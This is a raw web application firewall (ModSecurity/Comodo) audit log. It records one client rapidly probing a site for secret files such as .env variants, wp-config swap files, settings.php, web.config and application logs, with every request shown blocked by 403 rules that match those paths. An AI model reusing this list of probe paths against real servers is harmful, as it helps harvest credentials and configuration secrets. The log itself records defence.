p4=0, p5=46, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --150d876a-Z-- --2f257d67-A-- [09/May/2025:02:12:35 +0700] aB0CI44K347NtBcwXKx2CwAAAI0 103.236.140.4 55182 103.236.140.4 8181 --2f257d67-B-- GET /app/config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2f257d67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f257d67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731555468770 619 (- - -) Stopwatch2: 1746731555468770 619; combined=246, p1=214, p2=0, p3=0, p4=0, p5=31, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f257d67-Z-- --54359b41-A-- [09/May/2025:02:12:36 +0700] aB0CJI4K347NtBcwXKx2DgAAAI4 103.236.140.4 55192 103.236.140.4 8181 --54359b41-B-- GET /.gitignore HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --54359b41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54359b41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.gitignore" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731556520052 747 (- - -) Stopwatch2: 1746731556520052 747; combined=328, p1=291, p2=0, p3=0, p4=0, p5=37, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54359b41-Z-- --9cb4716b-A-- [09/May/2025:02:12:39 +0700] aB0CJ44K347NtBcwXKx2FgAAAIQ 103.236.140.4 55220 103.236.140.4 8181 --9cb4716b-B-- GET /sites/default/settings.php HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9cb4716b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cb4716b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sites/default/settings.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731559307675 706 (- - -) Stopwatch2: 1746731559307675 706; combined=306, p1=272, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb4716b-Z-- --2e84c93d-A-- [09/May/2025:02:12:44 +0700] aB0CLMP9GxxPAbCroFZCSgAAAFM 103.236.140.4 55264 103.236.140.4 8181 --2e84c93d-B-- GET /php.ini HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2e84c93d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e84c93d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731564984041 2181 (- - -) Stopwatch2: 1746731564984041 2181; combined=812, p1=394, p2=389, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e84c93d-Z-- --f2282d0b-A-- [09/May/2025:02:12:47 +0700] aB0CL8P9GxxPAbCroFZCVQAAAEo 103.236.140.4 55298 103.236.140.4 8181 --f2282d0b-B-- GET /public/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f2282d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2282d0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731567214928 715 (- - -) Stopwatch2: 1746731567214928 715; combined=282, p1=245, p2=0, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2282d0b-Z-- --8fd66a14-A-- [09/May/2025:02:12:47 +0700] aB0CL8P9GxxPAbCroFZCVwAAAFA 103.236.140.4 55302 103.236.140.4 8181 --8fd66a14-B-- GET /composer.json HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8fd66a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fd66a14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/composer.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731567671765 677 (- - -) Stopwatch2: 1746731567671765 677; combined=262, p1=235, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fd66a14-Z-- --2f62e458-A-- [09/May/2025:02:12:47 +0700] aB0CL8P9GxxPAbCroFZCWAAAAFY 103.236.140.4 55304 103.236.140.4 8181 --2f62e458-B-- GET /api/v1/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2f62e458-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f62e458-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731567994845 689 (- - -) Stopwatch2: 1746731567994845 689; combined=272, p1=225, p2=0, p3=0, p4=0, p5=46, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f62e458-Z-- --9e135d3a-A-- [09/May/2025:02:12:48 +0700] aB0CMMP9GxxPAbCroFZCXAAAAFU 103.236.140.4 55316 103.236.140.4 8181 --9e135d3a-B-- GET /.env.example HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9e135d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e135d3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731568956355 672 (- - -) Stopwatch2: 1746731568956355 672; combined=257, p1=222, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e135d3a-Z-- --00410b3f-A-- [09/May/2025:02:12:49 +0700] aB0CMcP9GxxPAbCroFZCXQAAAFc 103.236.140.4 55318 103.236.140.4 8181 --00410b3f-B-- GET /storage/logs/laravel.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --00410b3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00410b3f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731569120573 1710 (- - -) Stopwatch2: 1746731569120573 1710; combined=649, p1=314, p2=310, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00410b3f-Z-- --6debaf56-A-- [09/May/2025:02:12:50 +0700] aB0CMsP9GxxPAbCroFZCYgAAAEk 103.236.140.4 55328 103.236.140.4 8181 --6debaf56-B-- GET /.env.local HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --6debaf56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6debaf56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731570129462 633 (- - -) Stopwatch2: 1746731570129462 633; combined=251, p1=217, p2=0, p3=0, p4=0, p5=34, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6debaf56-Z-- --8b9f2639-A-- [09/May/2025:02:12:50 +0700] aB0CMsP9GxxPAbCroFZCYwAAAEU 103.236.140.4 55330 103.236.140.4 8181 --8b9f2639-B-- GET /.env.dev HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8b9f2639-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b9f2639-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731570390938 681 (- - -) Stopwatch2: 1746731570390938 681; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b9f2639-Z-- --8fe0c248-A-- [09/May/2025:02:12:50 +0700] aB0CMsP9GxxPAbCroFZCZAAAAEY 103.236.140.4 55332 103.236.140.4 8181 --8fe0c248-B-- GET /.env.test HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8fe0c248-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fe0c248-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731570645738 654 (- - -) Stopwatch2: 1746731570645738 654; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fe0c248-Z-- --5f277a0f-A-- [09/May/2025:02:12:50 +0700] aB0CMsP9GxxPAbCroFZCZQAAAFg 103.236.140.4 55334 103.236.140.4 8181 --5f277a0f-B-- GET /var/logs/dev.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5f277a0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f277a0f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731570841318 1642 (- - -) Stopwatch2: 1746731570841318 1642; combined=696, p1=318, p2=352, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f277a0f-Z-- --5ebf6f2d-A-- [09/May/2025:02:12:51 +0700] aB0CM8P9GxxPAbCroFZCZgAAAEE 103.236.140.4 55336 103.236.140.4 8181 --5ebf6f2d-B-- GET /var/logs/prod.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5ebf6f2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ebf6f2d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731571010772 1532 (- - -) Stopwatch2: 1746731571010772 1532; combined=616, p1=307, p2=282, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ebf6f2d-Z-- --0b7bb648-A-- [09/May/2025:02:12:54 +0700] aB0CNsP9GxxPAbCroFZCagAAAFM 103.236.140.4 55352 103.236.140.4 8181 --0b7bb648-B-- GET /web.config HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0b7bb648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b7bb648-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731574372612 628 (- - -) Stopwatch2: 1746731574372612 628; combined=251, p1=217, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b7bb648-Z-- --467e4f5f-A-- [09/May/2025:02:12:55 +0700] aB0CN8P9GxxPAbCroFZCbwAAAE0 103.236.140.4 55366 103.236.140.4 8181 --467e4f5f-B-- GET /app/etc/local.xml HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --467e4f5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --467e4f5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731575393501 647 (- - -) Stopwatch2: 1746731575393501 647; combined=254, p1=221, p2=0, p3=0, p4=0, p5=33, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --467e4f5f-Z-- --2ff67969-A-- [09/May/2025:02:12:55 +0700] aB0CN8P9GxxPAbCroFZCcQAAAE4 103.236.140.4 55370 103.236.140.4 8181 --2ff67969-B-- GET /var/log/system.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2ff67969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ff67969-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731575779154 1639 (- - -) Stopwatch2: 1746731575779154 1639; combined=721, p1=335, p2=359, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ff67969-Z-- --2026ee0a-A-- [09/May/2025:02:12:55 +0700] aB0CN8P9GxxPAbCroFZCcgAAAEg 103.236.140.4 55372 103.236.140.4 8181 --2026ee0a-B-- GET /var/log/exception.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2026ee0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2026ee0a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746731575957434 1564 (- - -) Stopwatch2: 1746731575957434 1564; combined=683, p1=315, p2=340, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2026ee0a-Z-- --60782d43-A-- [09/May/2025:02:12:56 +0700] aB0COMP9GxxPAbCroFZCcwAAAFQ 103.236.140.4 55374 103.236.140.4 8181 --60782d43-B-- GET /.wp-config.php.swp HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.201 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.201 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --60782d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60782d43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746731576122823 808 (- - -) Stopwatch2: 1746731576122823 808; combined=331, p1=276, p2=0, p3=0, p4=0, p5=55, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 